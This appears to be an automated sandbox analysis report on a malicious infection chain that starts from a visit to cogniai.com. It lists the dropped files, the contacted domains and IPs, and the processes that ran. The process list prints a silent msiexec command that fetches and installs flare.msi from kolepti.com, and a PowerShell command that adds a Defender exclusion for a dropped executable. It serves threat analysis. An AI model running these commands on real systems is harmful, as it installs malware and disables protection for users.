Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe (copy)
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files.cab
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 5647497 bytes, 1 file, at 0x2c +A "0xBKHFISYHPX.exe", ID 4151, number
1, 678 datablocks, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\6ff0d56ce15b47fcb2f8c73e3a3af1d7$dpx$.tmp\3b4007d200875d4c9c58c44073469727.tmp
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\msiwrapper.ini
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dduqm0ft.0hx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ev1stzcf.drx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vesidkki.pnh.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y52dqpn0.kyj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\gr0D62WdkfOXqpbHbRHp
|
PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
|
modified
|
||
|
C:\Windows\Installer\MSI5BF4.tmp
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Winwrapper
0.0.0.0, Subject: Winwrapper, Author: Winx86, Keywords: Installer, Template: Intel;1033, Revision Number: {D0826328-C10E-4DA1-9E4B-BD822747186A},
Create Time/Date: Thu Jan 11 14:59:44 2024, Last Saved Time/Date: Thu Jan 11 14:59:44 2024, Number of Pages: 200, Number of
Words: 12, Name of Creating Application: MSI Wrapper (11.0.53.0), Security: 2
|
dropped
|
||
|
C:\Windows\Installer\MSIE1FD.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
modified
|
||
|
C:\Windows\Installer\inprogressinstallinfo.ipi
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Logs\DPX\setupact.log
|
CSV text
|
dropped
|
||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
|
C:\Windows\System32\Hueta.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
|
C:\Windows\SystemTemp\~DFF7DE60EC351684EB.TMP
|
data
|
dropped
|
||
|
Chrome Cache Entry: 229
|
gzip compressed data, max compression, original size modulo 2^32 863
|
downloaded
|
||
|
Chrome Cache Entry: 230
|
gzip compressed data, max compression, original size modulo 2^32 1212
|
downloaded
|
||
|
Chrome Cache Entry: 231
|
gzip compressed data, max compression, original size modulo 2^32 1439
|
downloaded
|
||
|
Chrome Cache Entry: 232
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
dropped
|
||
|
Chrome Cache Entry: 233
|
PNG image data, 650 x 216, 8-bit colormap, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 234
|
PNG image data, 650 x 216, 8-bit colormap, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 235
|
PNG image data, 2508 x 816, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 236
|
gzip compressed data, max compression, original size modulo 2^32 2436
|
downloaded
|
||
|
Chrome Cache Entry: 237
|
gzip compressed data, max compression, original size modulo 2^32 2591
|
downloaded
|
||
|
Chrome Cache Entry: 238
|
gzip compressed data, max compression, original size modulo 2^32 6193
|
downloaded
|
||
|
Chrome Cache Entry: 239
|
gzip compressed data, max compression, original size modulo 2^32 419
|
downloaded
|
||
|
Chrome Cache Entry: 240
|
PNG image data, 8334 x 2084, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 241
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x380, components
3
|
dropped
|
||
|
Chrome Cache Entry: 242
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x380, components
3
|
dropped
|
||
|
Chrome Cache Entry: 243
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x380, components
3
|
downloaded
|
||
|
Chrome Cache Entry: 244
|
gzip compressed data, from Unix, original size modulo 2^32 16471
|
downloaded
|
||
|
Chrome Cache Entry: 245
|
gzip compressed data, max compression, original size modulo 2^32 845
|
downloaded
|
||
|
Chrome Cache Entry: 247
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x500, components
3
|
dropped
|
||
|
Chrome Cache Entry: 248
|
gzip compressed data, from Unix, original size modulo 2^32 2928
|
downloaded
|
||
|
Chrome Cache Entry: 249
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x380, components
3
|
downloaded
|
||
|
Chrome Cache Entry: 250
|
gzip compressed data, max compression, original size modulo 2^32 3710
|
downloaded
|
||
|
Chrome Cache Entry: 251
|
PNG image data, 71 x 75, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 252
|
gzip compressed data, max compression, original size modulo 2^32 907
|
downloaded
|
||
|
Chrome Cache Entry: 253
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
downloaded
|
||
|
Chrome Cache Entry: 254
|
gzip compressed data, max compression, original size modulo 2^32 2356
|
downloaded
|
||
|
Chrome Cache Entry: 255
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using
IJG JPEG v62), quality = 82", baseline, precision 8, 2560x1435, components 3
|
downloaded
|
||
|
Chrome Cache Entry: 256
|
gzip compressed data, max speed, from Unix, original size modulo 2^32 127818
|
downloaded
|
||
|
Chrome Cache Entry: 257
|
gzip compressed data, max speed, from Unix, original size modulo 2^32 153314
|
downloaded
|
||
|
Chrome Cache Entry: 258
|
gzip compressed data, max compression, original size modulo 2^32 876
|
downloaded
|
||
|
Chrome Cache Entry: 259
|
gzip compressed data, from Unix, original size modulo 2^32 118810
|
downloaded
|
||
|
Chrome Cache Entry: 260
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
dropped
|
||
|
Chrome Cache Entry: 261
|
gzip compressed data, from Unix, original size modulo 2^32 60312
|
downloaded
|
||
|
Chrome Cache Entry: 262
|
gzip compressed data, max compression, original size modulo 2^32 1225
|
downloaded
|
||
|
Chrome Cache Entry: 263
|
gzip compressed data, from Unix, original size modulo 2^32 17007
|
downloaded
|
||
|
Chrome Cache Entry: 264
|
gzip compressed data, max compression, original size modulo 2^32 889
|
downloaded
|
||
|
Chrome Cache Entry: 265
|
gzip compressed data, max compression, original size modulo 2^32 1218
|
downloaded
|
||
|
Chrome Cache Entry: 266
|
gzip compressed data, max compression, original size modulo 2^32 1170
|
downloaded
|
||
|
Chrome Cache Entry: 267
|
PNG image data, 602 x 360, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 268
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x500, components
3
|
dropped
|
||
|
Chrome Cache Entry: 269
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1920x1080,
components 3
|
downloaded
|
||
|
Chrome Cache Entry: 270
|
gzip compressed data, max compression, original size modulo 2^32 858
|
downloaded
|
||
|
Chrome Cache Entry: 271
|
gzip compressed data, from Unix, original size modulo 2^32 2859
|
downloaded
|
||
|
Chrome Cache Entry: 272
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x500, components
3
|
downloaded
|
||
|
Chrome Cache Entry: 273
|
gzip compressed data, max compression, original size modulo 2^32 853
|
downloaded
|
||
|
Chrome Cache Entry: 274
|
gzip compressed data, max compression, original size modulo 2^32 1440
|
downloaded
|
||
|
Chrome Cache Entry: 275
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using
IJG JPEG v62), quality = 82", baseline, precision 8, 2560x1435, components 3
|
dropped
|
||
|
Chrome Cache Entry: 276
|
gzip compressed data, max compression, original size modulo 2^32 1391
|
downloaded
|
||
|
Chrome Cache Entry: 277
|
gzip compressed data, max compression, original size modulo 2^32 866
|
downloaded
|
||
|
Chrome Cache Entry: 278
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x500, components
3
|
downloaded
|
||
|
Chrome Cache Entry: 279
|
gzip compressed data, max compression, original size modulo 2^32 1293
|
downloaded
|
||
|
Chrome Cache Entry: 280
|
gzip compressed data, from Unix, original size modulo 2^32 160787
|
downloaded
|
||
|
Chrome Cache Entry: 281
|
gzip compressed data, max compression, original size modulo 2^32 1907
|
downloaded
|
||
|
Chrome Cache Entry: 282
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x380, components
3
|
downloaded
|
||
|
Chrome Cache Entry: 283
|
gzip compressed data, max compression, original size modulo 2^32 2569
|
downloaded
|
||
|
Chrome Cache Entry: 284
|
gzip compressed data, from Unix, original size modulo 2^32 26682
|
dropped
|
||
|
Chrome Cache Entry: 285
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1920x1080,
components 3
|
dropped
|
||
|
Chrome Cache Entry: 286
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1920x1080,
components 3
|
downloaded
|
||
|
Chrome Cache Entry: 287
|
PNG image data, 3000 x 739, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 288
|
gzip compressed data, from Unix, original size modulo 2^32 7434
|
downloaded
|
||
|
Chrome Cache Entry: 289
|
gzip compressed data, max compression, original size modulo 2^32 1926
|
downloaded
|
||
|
Chrome Cache Entry: 290
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x500, components
3
|
downloaded
|
||
|
Chrome Cache Entry: 291
|
gzip compressed data, max compression, original size modulo 2^32 836
|
downloaded
|
||
|
Chrome Cache Entry: 292
|
gzip compressed data, from Unix, original size modulo 2^32 9337
|
downloaded
|
||
|
Chrome Cache Entry: 293
|
gzip compressed data, max compression, original size modulo 2^32 5746
|
downloaded
|
||
|
Chrome Cache Entry: 294
|
gzip compressed data, from Unix, original size modulo 2^32 16175
|
downloaded
|
||
|
Chrome Cache Entry: 295
|
gzip compressed data, max compression, original size modulo 2^32 115750
|
downloaded
|
||
|
Chrome Cache Entry: 296
|
gzip compressed data, from Unix, original size modulo 2^32 18926
|
downloaded
|
||
|
Chrome Cache Entry: 297
|
gzip compressed data, from Unix, original size modulo 2^32 10592
|
downloaded
|
||
|
Chrome Cache Entry: 298
|
gzip compressed data, max compression, original size modulo 2^32 1243
|
downloaded
|
||
|
Chrome Cache Entry: 299
|
gzip compressed data, max compression, original size modulo 2^32 1303
|
downloaded
|
||
|
Chrome Cache Entry: 300
|
PNG image data, 2508 x 816, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 301
|
gzip compressed data, max compression, original size modulo 2^32 1199
|
downloaded
|
||
|
Chrome Cache Entry: 302
|
gzip compressed data, max compression, original size modulo 2^32 58625
|
downloaded
|
||
|
Chrome Cache Entry: 303
|
PNG image data, 674 x 600, 8-bit colormap, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 304
|
gzip compressed data, max compression, original size modulo 2^32 818
|
downloaded
|
||
|
Chrome Cache Entry: 305
|
gzip compressed data, max compression, original size modulo 2^32 1837
|
downloaded
|
||
|
Chrome Cache Entry: 306
|
gzip compressed data, max compression, original size modulo 2^32 1907
|
downloaded
|
||
|
Chrome Cache Entry: 307
|
gzip compressed data, from Unix, original size modulo 2^32 103145
|
downloaded
|
||
|
Chrome Cache Entry: 308
|
gzip compressed data, max compression, original size modulo 2^32 825
|
downloaded
|
||
|
Chrome Cache Entry: 309
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x380, components
3
|
dropped
|
||
|
Chrome Cache Entry: 310
|
gzip compressed data, from Unix, original size modulo 2^32 14125
|
downloaded
|
||
|
Chrome Cache Entry: 311
|
gzip compressed data, max compression, original size modulo 2^32 1778
|
downloaded
|
||
|
Chrome Cache Entry: 312
|
PNG image data, 602 x 360, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 313
|
gzip compressed data, max compression, original size modulo 2^32 701
|
downloaded
|
||
|
Chrome Cache Entry: 314
|
gzip compressed data, max compression, original size modulo 2^32 1177
|
downloaded
|
||
|
Chrome Cache Entry: 315
|
TrueType Font data, 11 tables, 1st "GSUB", 16 names, Macintosh, type 1 string, flaticonRegularflaticonflaticonVersion 1.0flaticonGenerated
by svg2ttf from Fontello project.htt
|
downloaded
|
||
|
Chrome Cache Entry: 316
|
gzip compressed data, from Unix, original size modulo 2^32 25247
|
downloaded
|
||
|
Chrome Cache Entry: 317
|
PNG image data, 8334 x 2084, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 318
|
gzip compressed data, max compression, original size modulo 2^32 1300
|
downloaded
|
||
|
Chrome Cache Entry: 319
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x500, components
3
|
dropped
|
||
|
Chrome Cache Entry: 320
|
PNG image data, 1625 x 368, 8-bit colormap, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 321
|
gzip compressed data, from Unix, original size modulo 2^32 5983
|
downloaded
|
||
|
Chrome Cache Entry: 322
|
PNG image data, 1625 x 368, 8-bit colormap, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 323
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
downloaded
|
||
|
Chrome Cache Entry: 324
|
gzip compressed data, max compression, original size modulo 2^32 1983
|
downloaded
|
||
|
Chrome Cache Entry: 325
|
gzip compressed data, from Unix, original size modulo 2^32 2956
|
downloaded
|
||
|
Chrome Cache Entry: 326
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
dropped
|
||
|
Chrome Cache Entry: 327
|
PNG image data, 71 x 75, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 328
|
PNG image data, 3000 x 739, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 329
|
gzip compressed data, from Unix, original size modulo 2^32 67205
|
downloaded
|
||
|
Chrome Cache Entry: 330
|
PNG image data, 71 x 75, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 331
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1920x1080,
components 3
|
dropped
|
||
|
Chrome Cache Entry: 332
|
gzip compressed data, from Unix, original size modulo 2^32 26105
|
downloaded
|
||
|
Chrome Cache Entry: 333
|
gzip compressed data, from Unix, original size modulo 2^32 26682
|
downloaded
|
||
|
Chrome Cache Entry: 334
|
gzip compressed data, max compression, original size modulo 2^32 818
|
downloaded
|
||
|
Chrome Cache Entry: 335
|
gzip compressed data, max compression, original size modulo 2^32 1907
|
downloaded
|
||
|
Chrome Cache Entry: 336
|
PNG image data, 674 x 600, 8-bit colormap, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 337
|
PNG image data, 2000 x 404, 8-bit colormap, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 338
|
gzip compressed data, from Unix, original size modulo 2^32 18322
|
downloaded
|
||
|
Chrome Cache Entry: 339
|
gzip compressed data, from Unix, original size modulo 2^32 2956
|
dropped
|
||
|
Chrome Cache Entry: 340
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x500, components
3
|
dropped
|
||
|
Chrome Cache Entry: 341
|
gzip compressed data, from Unix, original size modulo 2^32 6277
|
downloaded
|
||
|
Chrome Cache Entry: 342
|
gzip compressed data, max compression, original size modulo 2^32 876
|
downloaded
|
||
|
Chrome Cache Entry: 343
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x500, components
3
|
dropped
|
||
|
Chrome Cache Entry: 344
|
gzip compressed data, max compression, original size modulo 2^32 413
|
downloaded
|
||
|
Chrome Cache Entry: 345
|
gzip compressed data, max compression, original size modulo 2^32 5659
|
downloaded
|
||
|
Chrome Cache Entry: 346
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x500, components
3
|
downloaded
|
||
|
Chrome Cache Entry: 347
|
gzip compressed data, max compression, original size modulo 2^32 3249
|
downloaded
|
||
|
Chrome Cache Entry: 348
|
gzip compressed data, max compression, original size modulo 2^32 678
|
downloaded
|
||
|
Chrome Cache Entry: 349
|
gzip compressed data, max compression, original size modulo 2^32 863
|
downloaded
|
||
|
Chrome Cache Entry: 350
|
gzip compressed data, max compression, from Unix, original size modulo 2^32 153397
|
downloaded
|
||
|
Chrome Cache Entry: 351
|
Web Open Font Format, TrueType, length 20940, version 0.0
|
downloaded
|
||
|
Chrome Cache Entry: 352
|
gzip compressed data, from Unix, original size modulo 2^32 116363
|
downloaded
|
||
|
Chrome Cache Entry: 353
|
PNG image data, 2000 x 404, 8-bit colormap, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 354
|
gzip compressed data, from Unix, original size modulo 2^32 60312
|
dropped
|
||
|
Chrome Cache Entry: 355
|
Web Open Font Format (Version 2), TrueType, length 14084, version 1.0
|
downloaded
|
||
|
Chrome Cache Entry: 356
|
gzip compressed data, from Unix, original size modulo 2^32 16753
|
downloaded
|
||
|
Chrome Cache Entry: 357
|
gzip compressed data, from Unix, original size modulo 2^32 14398
|
downloaded
|
||
|
Chrome Cache Entry: 358
|
gzip compressed data, from Unix, original size modulo 2^32 17649
|
downloaded
|
||
|
Chrome Cache Entry: 359
|
gzip compressed data, from Unix, original size modulo 2^32 516203
|
downloaded
|
||
|
Chrome Cache Entry: 360
|
gzip compressed data, max compression, original size modulo 2^32 871
|
downloaded
|
||
|
Chrome Cache Entry: 361
|
gzip compressed data, max compression, original size modulo 2^32 831
|
downloaded
|
||
|
Chrome Cache Entry: 362
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
downloaded
|
||
|
Chrome Cache Entry: 363
|
Zstandard compressed data (v0.8+), Dictionary ID: None
|
downloaded
|
||
|
Chrome Cache Entry: 364
|
gzip compressed data, max compression, original size modulo 2^32 1946
|
downloaded
|
||
|
Chrome Cache Entry: 365
|
gzip compressed data, from Unix, original size modulo 2^32 7641
|
downloaded
|
||
|
Chrome Cache Entry: 366
|
gzip compressed data, max compression, original size modulo 2^32 1189
|
downloaded
|
||
|
Chrome Cache Entry: 367
|
gzip compressed data, max compression, original size modulo 2^32 410
|
downloaded
|
||
|
Chrome Cache Entry: 368
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x500, components
3
|
downloaded
|
||
|
\Device\ConDrv
|
ASCII text, with CRLF, CR, LF line terminators
|
dropped
|
There are 148 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
|
|
|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1876,i,5440256914354337086,2860174452977065864,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
--variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=2172 /prefetch:11
|
|
|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" "HTTPS://cogniai.com"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
cmd /K msiexec /i https://kolepti.com/flare.msi /qn
|
|
|
|
C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe
|
"C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe Add-MpPreference -ExclusionPath "C:\Windows\system32\Hueta.exe"
|
|
|
|
C:\Windows\System32\Hueta.exe
|
"C:\Windows\system32\Hueta.exe"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe
|
|
|
|
C:\Windows\System32\appidpolicyconverter.exe
|
"C:\Windows\system32\appidpolicyconverter.exe"
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
msiexec /i https://kolepti.com/flare.msi /qn
|
||
|
C:\Windows\System32\msiexec.exe
|
C:\Windows\system32\msiexec.exe /V
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\syswow64\MsiExec.exe -Embedding BF62B73C00C1B0D08C68F4BFD7AE82B4
|
||
|
C:\Windows\SysWOW64\icacls.exe
|
"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\." /SETINTEGRITYLEVEL
(CI)(OI)HIGH
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\expand.exe
|
"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 9 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
HTTPS://cogniai.com
|
|
||
|
https://kolepti.com/flare.msi
|
unknown
|
|
|
|
https://security.flaweguaard.com/?domain=Y29nbmlhaS5jb20%3D&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9hZHMvMjAyMy8xMS90aHVtYl9DT0dOSUFJLUNvbmNlcHQ5LUZGLTAxLTEucG5n
|
|
||
|
https://analytiscnode.com/
|
unknown
|
||
|
https://api.ipify.org/
|
unknown
|
||
|
https://cogniai.com/wp-content/themes/techze/custom.js?ver=1
|
unknown
|
||
|
https://cogniai.com/
|
|||
|
https://security.flaweguaard.com/?domain=Y29nbmlhaS5jb20%3D&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb25
|
unknown
|
||
|
https://curl.se/docs/http-cookies.html
|
unknown
|
||
|
https://analytiscnode.com/A3fB7c10eD2aF5b8/?wsid=cogniai.com&domain=Y29nbmlhaS5jb20=&link=aHR0cHM6Ly
|
unknown
|
||
|
http://c.pki.goog/r/r4.crl
|
74.125.137.94
|
||
|
http://c.pki.goog/r/r1.crl
|
74.125.137.94
|
||
|
https://curl.se/docs/alt-svc.html
|
unknown
|
||
|
https://a.nel.cloudflare.com/report/v4?s=zuflUyn6wpns%2BQxm6uLfjcnmMTjpCzagZEPQ5ZiJ00wYgmh1BDB91s43N
|
unknown
|
||
|
https://cogniai.com/wp-content/themes/techze/js/yukari-cik.js?ver=1
|
unknown
|
||
|
https://cogniai.com/?verified=true(
|
unknown
|
||
|
https://cogniai.com/wp-content/themes/techze/js/pointer.js?ver=1
|
unknown
|
||
|
https://cogniai.com/?verified=trueFJLUNvbmNlcHQ5LUZGLTAxLTEucG5n
|
unknown
|
||
|
https://curl.se/docs/hsts.html
|
unknown
|
||
|
https://cogniai.com/wp-content/uploads/2023/11/thumb_COGNIAI-Concept9-FF-01-1.png
|
unknown
|
||
|
https://api.ipify.org
|
unknown
|
||
|
https://csp.withgoogle.com/csp/report-to/scaffolding/asuacrsguc:50:0
|
unknown
|
||
|
https://a.nel.cloudflare.com/report/v4?s=71vzwGo%2Fhm%2FpDed9cgryHnFL4kUcpE9%2FU2dfsEHZyIoiO3Nv5l89b
|
unknown
|
||
|
https://api.ipify.orgmV
|
unknown
|
||
|
https://cogniai.com/12180
|
unknown
|
||
|
https://csp.withgoogle.com/csp/scaffolding/asuacrsguc:50:0
|
unknown
|
||
|
https://d-nodes.shop/143033599042554?dtix0r5t=v9yU1KMas6TTLJXsHXxM%2B5Le4pejRZ8FoYSix9DoKZlSzGJQn0n1ycmUZFXxLyr2
|
172.67.149.12
|
||
|
https://cogniai.com/?verified=truebmlhaS5jb20=&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9h
|
unknown
|
||
|
https://api.ipify.orgP
|
unknown
|
||
|
https://d-nodes.shop/143033599042554?dtix0r5t=v9yU1KMas6TTLJXsHXxM%2B5Le4pejRZ8FoYSix9DoKZlSzGJQn0n1
|
unknown
|
||
|
https://csp.withgoogle.com/csp/apps-themes
|
unknown
|
||
|
https://csp.withgoogle.com/csp/scaffolding/asuacrsguc:50:0cross-origin-opener-policy-report-only:sam
|
unknown
|
||
|
https://www.google.com/
|
unknown
|
||
|
https://cogniai.com/?verified=true
|
There are 23 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
kolepti.com
|
172.67.148.228
|
|
|
|
analytiwave.com
|
104.21.68.46
|
||
|
a.nel.cloudflare.com
|
35.190.80.1
|
||
|
ka-f.fontawesome.com.cdn.cloudflare.net
|
172.67.139.119
|
||
|
d-nodes.shop
|
172.67.149.12
|
||
|
beacons-handoff.gcp.gvt2.com
|
142.250.101.94
|
||
|
security.flaweguaard.com
|
172.67.132.245
|
||
|
beacons.gvt2.com
|
142.250.101.94
|
||
|
pki-goog.l.google.com
|
74.125.137.94
|
||
|
cogniai.com
|
74.208.236.215
|
||
|
analytiscnode.com
|
104.21.80.1
|
||
|
www.google.com
|
74.125.137.105
|
||
|
api.ipify.org
|
172.67.74.152
|
||
|
ka-f.fontawesome.com
|
unknown
|
||
|
beacons.gcp.gvt2.com
|
unknown
|
||
|
c.pki.goog
|
unknown
|
There are 6 hidden domains, click here to show them.
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
91.200.14.69
|
unknown
|
Ukraine
|
|
|
|
172.67.148.228
|
kolepti.com
|
United States
|
|
|
|
192.168.2.24
|
unknown
|
unknown
|
|
|
|
74.208.236.215
|
cogniai.com
|
United States
|
||
|
172.67.139.119
|
ka-f.fontawesome.com.cdn.cloudflare.net
|
United States
|
||
|
104.21.80.1
|
analytiscnode.com
|
United States
|
||
|
104.21.68.46
|
analytiwave.com
|
United States
|
||
|
172.67.132.245
|
security.flaweguaard.com
|
United States
|
||
|
74.125.137.105
|
www.google.com
|
United States
|
||
|
172.67.186.167
|
unknown
|
United States
|
||
|
142.250.101.94
|
beacons-handoff.gcp.gvt2.com
|
United States
|
||
|
35.190.80.1
|
a.nel.cloudflare.com
|
United States
|
||
|
172.67.149.12
|
d-nodes.shop
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
||
|
172.67.74.152
|
api.ipify.org
|
United States
|
There are 5 hidden IPs, click here to show them.
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
|
Owner
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
|
SessionHash
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
|
Sequence
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
20DCBD7D000
|
heap
|
page read and write
|
|
|
|
20D26D62000
|
heap
|
page read and write
|
|
|
|
226096B5000
|
heap
|
page read and write
|
||
|
1668FF97000
|
unkown
|
page read and write
|
||
|
1668F74D000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668B3CA000
|
unkown
|
page read and write
|
||
|
1668A691000
|
unkown
|
page read and write
|
||
|
1668F8D5000
|
unkown
|
page read and write
|
||
|
43F01FC000
|
unkown
|
page read and write
|
||
|
1668F0A1000
|
unkown
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
1668B9DD000
|
unkown
|
page read and write
|
||
|
1668F888000
|
unkown
|
